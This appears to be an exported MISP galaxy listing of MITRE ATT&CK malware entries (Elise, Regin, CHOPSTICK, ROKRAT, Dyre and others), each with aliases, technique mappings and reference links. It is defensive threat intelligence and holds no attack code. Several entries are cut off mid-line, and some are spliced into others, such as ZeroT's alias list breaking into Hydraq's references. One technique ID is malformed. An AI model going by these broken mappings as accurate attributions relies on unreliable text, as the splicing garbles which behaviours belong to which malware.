- uses: *misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001"* with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Shortcut Modification - T1547.009" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Clipboard Data - T1115" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Automated Collection - T1119" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Data Transfer Size Limits - T1030" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="DNS - T1071.004" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Domain Groups - T1069.002" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://attack.mitre.org/software/S0170">https://attack.mitre.org/software/S0170</a></td>
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<tr>
<td><a href="http://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/">http://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/</a></td>
</tr>
</tbody>
</table>

**hcdLoader - S0071**

[hcdLoader](https://attack.mitre.org/software/S0071) is a remote access tool (RAT) that has been used by [APT18](https://attack.mitre.org/groups/G0026). (Citation: Dell Lateral Movement)

The tag is: *misp-galaxy:mitre-malware="hcdLoader - S0071"*
hcdLoader - S0071 is also known as:

- hcdLoader

hcdLoader - S0071 has relationships with:

- similar: misp-galaxy:rat="hcdLoader" with estimative-language:likelihood-probability="likely"
- uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://attack.mitre.org/software/S0071">https://attack.mitre.org/software/S0071</a></td>
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<td><a href="http://www.secureworks.com/resources/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems/">http://www.secureworks.com/resources/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems/</a></td>
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Elise - S0081

[Elise](https://attack.mitre.org/software/S0081) is a custom backdoor Trojan that appears to be used exclusively by [Lotus Blossom](https://attack.mitre.org/groups/G0030). It is part of a larger group of tools referred to as LStudio, ST Group, and APT0LSTU. (Citation: Lotus Blossom Jun 2015)(Citation: Accenture Dragonfish Jan 2018)

The tag is: **misp-galaxy:mitre-malware="Elise - S0081"**

Elise - S0081 is also known as:

- Elise
- BKDR_ESILE
- Page

Elise - S0081 has relationships with:

- similar: misp-galaxy:tool="Elise Backdoor" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:malpedia="Elise" with estimative-language:likelihood-probability="likely"
- uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with...
estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"


- uses: misp-galaxy:mitre-attack-pattern="Dynamic-link Library Injection - T1055.001" with estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"


- uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"


- uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-attack-pattern="Local Account - T1087.001" with estimative-language:likelihood-probability="almost-certain"

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Links

https://attack.mitre.org/software/S0081

https://www.paloaltonetworks.com/resources/research/unit42-operation-lotus-blossom.html


2382
Sykipot - S0018

[Sykipot](https://attack.mitre.org/software/S0018) is malware that has been used in spearphishing campaigns since approximately 2007 against victims primarily in the US. One variant of [Sykipot](https://attack.mitre.org/software/S0018) hijacks smart cards on victims. (Citation: Alienvault Sykipot DOD Smart Cards) The group using this malware has also been referred to as Sykipot. (Citation: Blasco 2013)

The tag is: `misp-galaxy:mitre-malware="Sykipot - S0018"

Sykipot - S0018 is also known as:

- Sykipot

Sykipot - S0018 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Dynamic-link Library Injection - T1055.001"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Domain Account - T1087.002"` with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://attack.mitre.org/software/S0018">https://attack.mitre.org/software/S0018</a></td>
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Volgmer - S0180

[Volgmer](https://attack.mitre.org/software/S0180) is a backdoor Trojan designed to provide covert access to a compromised system. It has been used since at least 2013 to target the government, financial, automotive, and media industries. Its primary delivery mechanism is suspected to be spearphishing. (Citation: US-CERT Volgmer Nov 2017)

The tag is: misp-galaxy:mitre-malware="Volgmer - S0180"

Volgmer - S0180 is also known as:

- Volgmer

Volgmer - S0180 has relationships with:

- similar: misp-galaxy:tool="Volgmer" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:malpedia="Volgmer" with estimative-language:likelihood-probability="likely"
- uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with
estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Uncommonly Used Port - T1065" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Masquerade Task or Service - T1036.004" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-D_WHITE_S508C.PDF">https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-D_WHITE_S508C.PDF</a></td>
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</table>

Epic - S0091

[Epic](https://attack.mitre.org/software/S0091) is a backdoor that has been used by [Turla](https://attack.mitre.org/groups/G0010). (Citation: Kaspersky Turla)

The tag is: `misp-galaxy:mitre-malware="Epic - S0091"`

Epic - S0091 is also known as:

- Epic
- Tavdig
- Wipbot
- WorldCupSec
- TadjMakhal
Epic - S0091 has relationships with:

- similar: misp-galaxy:tool="Wipbot" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:malpedia="Wipbot" with estimative-language:likelihood-probability="likely"
- uses: misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Local Account - T1087.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Local Groups - T1069.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
Regin - S0019

[Regin](https://attack.mitre.org/software/S0019) is a malware platform that has targeted victims in a range of industries, including telecom, government, and financial institutions. Some [Regin](https://attack.mitre.org/software/S0019) timestamps date back to 2003. (Citation: Kaspersky Regin)

The tag is: `misp-galaxy:mitre-malware="Regin - S0019"`

Regin - S0019 is also known as:

- Regin

Regin - S0019 has relationships with:

- similar: `misp-galaxy:tool="Regin"` with estimative-language:likelihood-probability="likely"
- similar: `misp-galaxy:malpedia="Regin"` with estimative-language:likelihood-probability="likely"
- uses: `misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Modify Registry - T1112"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="NTFS File Attributes - T1564.004"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Network Sniffing - T1040"` with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Invalid Code Signature - T1036.001" with estimative-language:likelihood-probability="almost-certain"


• uses: misp-galaxy:mitre-attack-pattern="Hidden File System - T1564.005" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://attack.mitre.org/software/S0019">https://attack.mitre.org/software/S0019</a></td>
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Chaos - S0220

[Chaos](https://attack.mitre.org/software/S0220) is Linux malware that compromises systems by brute force attacks against SSH services. Once installed, it provides a reverse shell to its controllers, triggered by unsolicited packets. (Citation: Chaos Stolen Backdoor)

The tag is: *misp-galaxy:mitre-malware="Chaos - S0220"*

Chaos - S0220 is also known as:

• Chaos

Chaos - S0220 has relationships with:

• uses: misp-galaxy:mitre-attack-pattern="Brute Force - T1110" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"


• uses: misp-galaxy:mitre-attack-pattern="Unix Shell - T1059.004" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Multi-Stage Channels - T1104" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Traffic Signaling - T1205" with estimative-language:likelihood-probability="almost-certain"
Urobouros - S0022

[Urobouros](https://attack.mitre.org/software/S0022) is a rootkit used by [Turla](https://attack.mitre.org/groups/G0010). (Citation: Kaspersky Turla)

The tag is: *misp-galaxy:mitre-malware="Urobouros - S0022"*

Urobouros - S0022 is also known as:

- Urobouros

Urobouros - S0022 has relationships with:

- similar: *misp-galaxy:tool="Turla" with estimative-language:likelihood-probability="likely"*
- similar: *misp-galaxy:malpedia="Urobouros (Windows)" with estimative-language:likelihood-probability="likely"*
- uses: *misp-galaxy:mitre-attack-pattern="Rootkit - T1014" with estimative-language:likelihood-probability="almost-certain"*

adbupd - S0202

[adbupd](https://attack.mitre.org/software/S0202) is a backdoor used by [PLATINUM](https://attack.mitre.org/groups/G0068) that is similar to [Dipsind](https://attack.mitre.org/software/S0200). (Citation: Microsoft PLATINUM April 2016)

The tag is: *misp-galaxy:mitre-malware="adbupd - S0202"*

adbupd - S0202 is also known as:

- adbupd

adbupd - S0202 has relationships with:

- uses: *misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation Event 2389"*
CHOPSTICK - S0023

[CHOPSTICK](https://attack.mitre.org/software/S0023) is a malware family of modular backdoors used by [APT28](https://attack.mitre.org/groups/G0007). It has been used since at least 2012 and is usually dropped on victims as second-stage malware, though it has been used as first-stage malware in several cases. It has both Windows and Linux variants. (Citation: FireEye APT28) (Citation: ESET Sednit Part 2) (Citation: FireEye APT28 January 2017) (Citation: DOJ GRU Indictment Jul 2018) It is tracked separately from the [X-Agent for Android](https://attack.mitre.org/software/S0314).

The tag is: `misp-galaxy:mitre-malware="CHOPSTICK - S0023"`

CHOPSTICK - S0023 is also known as:

- CHOPSTICK
- Backdoor.SofacyX
- SPLM
- Xagent
- X-Agent
- webhp

CHOPSTICK - S0023 has relationships with:

- similar: `misp-galaxy:tool="CHOPSTICK"` with estimative-language:likelihood-probability="likely"
- similar: `misp-galaxy:tool="X-Agent"` with estimative-language:likelihood-probability="likely"
- similar: `misp-galaxy:malpedia="X-Agent (Android)"` with estimative-language:likelihood-probability="likely"
- uses: `misp-galaxy:mitre-attack-pattern="Fallback Channels - T1008"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Communication Through Removable Media - T1092"`
with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Replication Through Removable Media - T1091" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Internal Proxy - T1090.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"


• uses: misp-galaxy:mitre-attack-pattern="Virtualization/Sandbox Evasion - T1497" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Mail Protocols - T1071.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Asymmetric Cryptography - T1573.002" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://attack.mitre.org/software/S0023">https://attack.mitre.org/software/S0023</a></td>
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</table>
DroidJack - S0320

[DroidJack](https://attack.mitre.org/software/S0320) is an Android remote access tool that has been observed posing as legitimate applications including the Super Mario Run and Pokemon GO games. (Citation: Zscaler-SuperMarioRun) (Citation: Proofpoint-Droidjack)

The tag is: misp-galaxy:mitre-malware="DroidJack - S0320"

DroidJack - S0320 is also known as:

- DroidJack

DroidJack - S0320 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Masquerade as Legitimate Application - T1444" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://attack.mitre.org/software/S0320">https://attack.mitre.org/software/S0320</a></td>
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Hydraq - S0203

[Hydraq](https://attack.mitre.org/software/S0203) is a data-theft trojan first used by [Elderwood](https://attack.mitre.org/groups/G0066) in the 2009 Google intrusion known as Operation Aurora, though variations of this trojan have been used in more recent campaigns by other Chinese actors, possibly including [APT17](https://attack.mitre.org/groups/G0025). (Citation: MicroFocus 9002 Aug 2016) (Citation: Symantec Elderwood Sept 2012) (Citation: Symantec Trojan.Hydraq Jan 2010) (Citation: ASERT Seven Pointed Dagger Aug 2015) (Citation: FireEye DeputyDog 9002 November 2013) (Citation: ProofPoint GoT 9002 Aug 2017) (Citation: FireEye
The tag is: `misp-galaxy:mitre-malware="Hydraq - S0203"`

Hydraq - S0203 is also known as:

- Hydraq
- Aurora
- 9002 RAT

Hydraq - S0203 has relationships with:

- similar: `misp-galaxy:tool="Aurora"` with `estimative-language:likelihood-probability="likely"`
- similar: `misp-galaxy:malpedia="9002 RAT"` with `estimative-language:likelihood-probability="likely"`
- similar: `misp-galaxy:malpedia="Aurora"` with `estimative-language:likelihood-probability="likely"`
- uses: `misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003"` with `estimative-language:likelihood-probability="almost-certain"`
- uses: `misp-galaxy:mitre-attack-pattern="Query Registry - T1012"` with `estimative-language:likelihood-probability="almost-certain"`
- uses: `misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083"` with `estimative-language:likelihood-probability="almost-certain"`
- uses: `misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105"` with `estimative-language:likelihood-probability="almost-certain"`
- uses: `misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004"` with `estimative-language:likelihood-probability="almost-certain"`
- uses: `misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027"` with `estimative-language:likelihood-probability="almost-certain"`
- uses: `misp-galaxy:mitre-attack-pattern="Modify Registry - T1112"` with `estimative-language:likelihood-probability="almost-certain"`
- uses: `misp-galaxy:mitre-attack-pattern="Process Discovery - T1057"` with `estimative-
ZeroT - S0230

ZeroT - S0230 is a Trojan used by [TA459](https://attack.mitre.org/groups/G0062), often in conjunction with [PlugX](https://attack.mitre.org/software/S0013). (Citation: Proofpoint TA459 April 2017) (Citation: Proofpoint ZeroT Feb 2017)

The tag is: *misp-galaxy:mitre-malware="ZeroT - S0230"*

ZeroT - S0230 is also known as:

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<td><a href="https://attack.mitre.org/software/S0203">https://attack.mitre.org/software/S0203</a></td>
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<tr>
<td><a href="https://www.symantec.com/connect/blogs/trojanhydraq-incident">https://www.symantec.com/connect/blogs/trojanhydraq-incident</a></td>
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<tr>
<td><a href="https://www.fireeye.com/blog/threat-research/2013/05/ready-for-summer-the-sunshop-campaign.html">https://www.fireeye.com/blog/threat-research/2013/05/ready-for-summer-the-sunshop-campaign.html</a></td>
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</tbody>
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ZeroT - S0230 has relationships with:

- similar: misp-galaxy:tool="ZeroT" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:malpedia="ZeroT" with estimative-language:likelihood-probability="likely"
- uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Binary Padding - T1027.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 4499. Table References

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<tr>
<td><a href="https://attack.mitre.org/software/S0230">https://attack.mitre.org/software/S0230</a></td>
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Twitoor - S0302

[Twitoor](https://attack.mitre.org/software/S0302) is a dropper application capable of receiving commands from social media. (Citation: ESET-Twitoor)

The tag is: `misp-galaxy:mitre-malware="Twitoor - S0302"`

Twitoor - S0302 is also known as:

- Twitoor

Twitoor - S0302 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Suppress Application Icon - T1508"` with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://attack.mitre.org/software/S0302">https://attack.mitre.org/software/S0302</a></td>
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Get2 - S0460

[Get2](https://attack.mitre.org/software/S0460) is a downloader written in C++ that has been used by [TA505](https://attack.mitre.org/groups/G0092) to deliver [FlawedGrace](https://attack.mitre.org/software/S0383), [FlawedAmmyy](https://attack.mitre.org/software/S0381), Snatch and [SDBbot](https://attack.mitre.org/software/S0461). (Citation: Proofpoint TA505 October 2019)

The tag is: `misp-galaxy:mitre-malware="Get2 - S0460"`

Get2 - S0460 is also known as:

- Get2

Get2 - S0460 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Dynamic-link Library Injection - T1055.001"` with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://attack.mitre.org/software/S0460">https://attack.mitre.org/software/S0460</a></td>
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LOWBALL - S0042

[LOWBALL](https://attack.mitre.org/software/S0042) is malware used by [admin@338](https://attack.mitre.org/groups/G0018). It was used in August 2015 in email messages targeting Hong Kong-based media organizations. (Citation: FireEye admin@338)

The tag is: *misp-galaxy:mitre-malware="LOWBALL - S0042"

LOWBALL - S0042 is also known as:

• LOWBALL

LOWBALL - S0042 has relationships with:

• uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Bidirectional Communication - T1102.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 4502. Table References

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<td><a href="https://attack.mitre.org/software/S0042">https://attack.mitre.org/software/S0042</a></td>
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<tr>
<td><a href="https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html">https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html</a></td>
</tr>
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</table>
ROKRAT - S0240

[ROKRAT](https://attack.mitre.org/software/S0240) is a cloud-based remote access tool (RAT) used by [APT37](https://attack.mitre.org/groups/G0067). This software has been used to target victims in South Korea. [APT37](https://attack.mitre.org/groups/G0067) used ROKRAT during several campaigns in 2016 through 2018. (Citation: Talos ROKRAT) (Citation: Talos Group123)

The tag is: *misp-galaxy:mitre-malware="ROKRAT - S0240"

ROKRAT - S0240 is also known as:

- ROKRAT

ROKRAT - S0240 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="System Checks - T1497.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Windows Credential Manager - T1555.004" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"

Table 4503. Table References

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<td><a href="https://attack.mitre.org/software/S0240">https://attack.mitre.org/software/S0240</a></td>
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</table>

**Briba - S0204**

[Briba](https://attack.mitre.org/software/S0204) is a trojan used by [Elderwood](https://attack.mitre.org/groups/G0066) to open a backdoor and download files on to compromised hosts. (Citation: Symantec Elderwood Sept 2012) (Citation: Symantec Briba May 2012)

The tag is: **misp-galaxy:mitre-malware="Briba - S0204"**

Briba - S0204 is also known as:

- Briba

Briba - S0204 has relationships with:

• uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 4504. Table References

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<td><a href="https://attack.mitre.org/software/S0204">https://attack.mitre.org/software/S0204</a></td>
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</table>
### Dvmap - S0420

[Dvmap](https://attack.mitre.org/software/S0420) is rooting malware that injects malicious code into system runtime libraries. It is credited with being the first malware that performs this type of code injection. (Citation: SecureList DVMap June 2017)

The tag is: `misp-galaxy:mitre-malware="Dvmap - S0420"`

Dvmap - S0420 is also known as:

- Dvmap

Dvmap - S0420 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1406"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Exploit OS Vulnerability - T1404"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Install Insecure or Malicious Configuration - T1478"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="System Information Discovery - T1426"` with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://attack.mitre.org/software/S0420">https://attack.mitre.org/software/S0420</a></td>
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### Dyre - S0024

[Dyre](https://attack.mitre.org/software/S0024) is a banking Trojan that has been used for financial gain. (Citation: Symantec Dyre June 2015)(Citation: Malwarebytes Dyreza November 2015)

The tag is: `misp-galaxy:mitre-malware="Dyre - S0024"`
Dyre - S0024 is also known as:

- Dyre
- Dyzap
- Dyreza

Dyre - S0024 has relationships with:

- similar: misp-galaxy:banker="Dyre" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:malpedia="Dyre" with estimative-language:likelihood-probability="likely"
- uses: misp-galaxy:mitre-attack-pattern="Dynamic-link Library Injection - T1055.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="System Checks - T1497.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-
### CALENDAR - S0025

[CALENDAR](https://attack.mitre.org/software/S0025) is malware used by [APT1](https://attack.mitre.org/groups/G0006) that mimics legitimate Gmail Calendar traffic. (Citation: Mandiant APT1)

The tag is: `misp-galaxy:mitre-malware="CALENDAR - S0025"`

CALENDAR - S0025 is also known as:

- CALENDAR

CALENDAR - S0025 has relationships with:

- similar: `misp-galaxy:tool="CALENDAR"` with estimative-language:likelihood-probability="likely"

### BLINDINGCAN - S0520

[BLINDINGCAN](https://attack.mitre.org/software/S0520) is a remote access Trojan that has been used by the North Korean government since at least early 2020 in cyber operations against defense, engineering, and government organizations in Western Europe and the US. (Citation: US-CERT BLINDINGCAN Aug 2020)(Citation: NHS UK BLINDINGCAN Aug 2020)

The tag is: `misp-galaxy:mitre-malware="BLINDINGCAN - S0520"`
BLINDINGCAN - S0520 is also known as:

- BLINDINGCAN

BLINDINGCAN - S0520 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
